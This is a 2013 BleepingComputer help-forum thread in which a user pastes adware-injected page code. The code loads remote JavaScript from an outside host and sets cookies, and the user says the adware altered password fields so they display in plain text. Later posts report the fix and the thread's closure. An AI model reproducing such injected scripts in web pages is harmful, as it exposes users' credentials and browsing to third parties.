Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Possible Hijacking?


  • This topic is locked This topic is locked
2 replies to this topic

#1 tyler123

tyler123

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:07:58 AM

Posted 28 November 2013 - 05:44 AM

Hello,

 

I noticed upon viewing the source of some websites the same code is in the source code of whatever page I'm viewing. I've checked quite a bit of pages to make sure it's not the website, and it's not. At the top of the page, the following code is displayed:

<script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?g=14D55225-3866-41E2-141F-89A0CAC28320&s=8F71DB22-A8DF-4C0D-A26C-2142A9317F6A&z=1385446817"></script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script type="text/javascript">
function getCookie(c_name) { // Local function for getting a cookie value
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start!=-1) {
        c_start=c_start + c_name.length + 1;
        c_end=document.cookie.indexOf(";", c_start);

        if (c_end==-1) 
            c_end = document.cookie.length;

        return unescape(document.cookie.substring(c_start,c_end));
        }
    }
    return "";
}
function setCookie(c_name, value, expiredays) { // Local function for setting a value of a cookie
    var exdate = new Date();
    exdate.setDate(exdate.getDate()+expiredays);
    document.cookie = c_name + "=" + escape(value) + ((expiredays==null) ? "" : ";expires=" + exdate.toGMTString()) + ";path=/";
}
function getHostUri() {
    var loc = document.location;
    return loc.toString();
}
setCookie('YPF8827340282Jdskjhfiw_928937459182JAX666', '*MY IP HERE*', 10);
location.hre = getHostUri();
</script>

What brought this to my attention is on a site where it requires me to put an encrypted PIN in to continue on is outputting the PIN in plain text, rather encrypted. I viewed-source the page and I noticed it's replacing the:

<input type="password">

as

<input type="passwod">

I double checked the legitimate file and it's spelled correctly. It also works for my colleagues as well. This isn't just happening on Google Chrome, it's happening on all browsers such as Opera, IE, Chrome, and Firefox. 

 

Things I've attempted to do to troubleshoot the issue:

- System Restore.

- Cleared cookies in Chrome.

- Ran Malwarebytes (detected loads and removed malicious files).

- Ran ComboFix (detected loads and removed malicious files) ~ I was referred to this topic: http://forums.informaction.com/viewtopic.php?f=8&t=10473).

- Ran SpyBot (detected loads and removed malicious files).

- Ran SUPERAntiSpyware (detected loads and removed malicious files).

 

At the end of all of this troubleshooting, I'm still left with this problem and it's really confusing me. Hopefully someone here can help me.

 

Thanks.



BC AdBot (Login to Remove)

 


#2 tyler123

tyler123
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:07:58 AM

Posted 28 November 2013 - 06:31 AM

UPDATE: Fixed this, apparently something with "ScorpianSaver" was found in my Program Files and I had to use Unlocker to the kill the process. It deleted everything except "Adpeak.exe" was deleted then upon reboot by Unlocker, its been deleted. I attempted to go to the websites and it was fixed. :)



#3 Orange Blossom

Orange Blossom

    OBleepin Investigator


  • Moderator
  • 36,906 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Bloomington, IN
  • Local time:11:58 AM

Posted 01 December 2013 - 02:25 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Help us help you. If HelpBot replies, you MUST follow step 1 in its reply so we know you need help.

Orange Blossom

An ounce of prevention is worth a pound of cure

SpywareBlaster, WinPatrol Plus, ESET Smart Security, Malwarebytes' Anti-Malware, NoScript Firefox ext., Norton noscript




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users